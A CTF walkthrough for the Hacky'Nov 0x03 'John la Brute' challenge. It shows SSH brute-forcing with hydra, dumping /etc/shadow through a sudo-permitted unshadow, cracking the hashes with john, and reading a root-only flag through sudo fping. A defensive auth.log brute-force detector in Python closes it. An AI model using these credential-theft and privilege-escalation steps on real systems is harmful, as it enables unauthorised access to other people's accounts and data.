
HN0x03 | John la Brute

This challenge is a part of the Hacky’Nov 0x03 CTF.

Goal

Find a way to connect to the machine and escalate your privileges to root to read the flag.

Walkthrough

The only thing we know is that we should be able to connect to the machine as the armi user. The challenge name is clearly a reference to John the Ripper, the well-known password cracker, so let's try to brute-force the SSH login with hydra and the rockyou.txt wordlist.

$ hydra -l armi -P /usr/share/wordlists/rockyou.txt ssh://ctfcafe.hackynov.fr:30008 -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://ctfcafe.hackynov.fr:30008/
[30008][ssh] host: ctfcafe.hackynov.fr   login: armi   password: chocolate
1 of 1 target successfully completed, 1 valid password found

Got it: the password is very weak and hydra finds it almost immediately. Let's connect to the machine and check the sudo permissions:

armi@5e840f4577b9:~$ sudo -l
Matching Defaults entries for armi on 5e840f4577b9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User armi may run the following commands on 5e840f4577b9:
    (ALL) NOPASSWD: /usr/sbin/john
    (ALL) NOPASSWD: /usr/sbin/unshadow

We can run john and unshadow as root, so we probably have to crack some passwords. Since unshadow runs as root, it can read /etc/shadow for us:

armi@5e840f4577b9:~$ sudo /usr/sbin/unshadow /etc/passwd /etc/shadow
root:*:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:*:42:65534::/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:!*:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:!*:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:!:100:101::/nonexistent:/usr/sbin/nologin
sshd:!:101:65534::/run/sshd:/usr/sbin/nologin
prince:$1$71KuAfWl$Il.C8TKOMXU/JmNnaG6Yq.:1000:1000:,,,:/home/prince:/bin/bash
armi:$1$m8N4.9F1$3sh6Qtegg9QzJVj0bM6Wy0:1001:1001:,,,:/home/armi:/bin/bash

Only prince and armi have a password hash; every other account is locked. Let's try to crack prince's password:

# Save the unshadowed output to /tmp/unshadowed on the attacking machine and run john there

┌──(nhqml㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/unshadowed
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate        (armi)
1234a            (prince)
2g 0:00:00:00 DONE (2024-06-04 09:56) 3.076g/s 83889p/s 84480c/s 84480C/s SHORTY13..022186
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(nhqml㉿kali)-[~]
└─$ john --show /tmp/unshadowed
prince:1234a:1000:1000:,,,:/home/prince:/bin/bash
armi:chocolate:1001:1001:,,,:/home/armi:/bin/bash

2 password hashes cracked, 0 left

We got prince's password; let's log in as this user and check what we can do:

prince@5e840f4577b9:~$ sudo -l
Matching Defaults entries for prince on 5e840f4577b9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User prince may run the following commands on 5e840f4577b9:
    (ALL) NOPASSWD: /usr/bin/fping

We can run fping as root. With -f, fping reads its list of targets from a file and echoes every entry it cannot resolve in an error message, so pointing it at the flag file prints the flag:

prince@5e840f4577b9:~$ sudo fping -f flag.txt
HN0x03{Ireallyl0veCh0c0late}: Name or service not known
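As a defender's footnote to the brute-force step at the start of the walkthrough, here is an added example (not part of the writeup) that flags the pattern hydra leaves in sshd's auth.log: a burst of failed logins from one source inside a short window, and whether an accepted login from the same source followed. The log lines, host name and IP addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the syslog format sshd writes to /var/log/auth.log.
# The host name and the source addresses are placeholders, not real data.
SAMPLE_AUTH_LOG = """\
Jun  4 09:50:01 5e840f4577b9 sshd[1201]: Failed password for armi from 203.0.113.7 port 50211 ssh2
Jun  4 09:50:01 5e840f4577b9 sshd[1202]: Failed password for armi from 203.0.113.7 port 50212 ssh2
Jun  4 09:50:02 5e840f4577b9 sshd[1203]: Failed password for armi from 203.0.113.7 port 50213 ssh2
Jun  4 09:50:02 5e840f4577b9 sshd[1204]: Failed password for invalid user admin from 203.0.113.7 port 50214 ssh2
Jun  4 09:50:03 5e840f4577b9 sshd[1205]: Failed password for armi from 203.0.113.7 port 50215 ssh2
Jun  4 09:50:03 5e840f4577b9 sshd[1206]: Accepted password for armi from 203.0.113.7 port 50216 ssh2
Jun  4 09:55:40 5e840f4577b9 sshd[1300]: Failed password for prince from 198.51.100.9 port 40001 ssh2
Jun  4 09:57:12 5e840f4577b9 sshd[1301]: Accepted password for prince from 198.51.100.9 port 40002 ssh2
"""

# Matches both "Failed password for <user>" and "Failed password for invalid user <user>".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def detect_ssh_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return one finding per source IP that produced at least `threshold`
    failed logins inside `window`. Each finding records the peak burst size,
    the user names tried, and the user an Accepted login landed as (if any
    followed the burst within the window), which is the case worth paging on."""
    recent = defaultdict(list)  # ip -> [(timestamp, user)] of failures still inside the window
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd password event
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            hits = [(t, u) for t, u in recent[ip] if ts - t <= window]
            hits.append((ts, user))
            recent[ip] = hits
            if len(hits) >= threshold:
                f = findings.setdefault(ip, {"ip": ip, "failures": 0,
                                             "users": set(), "succeeded_as": None})
                f["failures"] = max(f["failures"], len(hits))
                f["users"].update(u for _, u in hits)
        elif ip in findings and recent[ip] and ts - recent[ip][-1][0] <= window:
            findings[ip]["succeeded_as"] = user  # success right after the burst
    return list(findings.values())
```

The same burst-then-Accepted sequence is what fail2ban-style rate limiting or a low sshd MaxAuthTries would have cut short before rockyou.txt got to "chocolate".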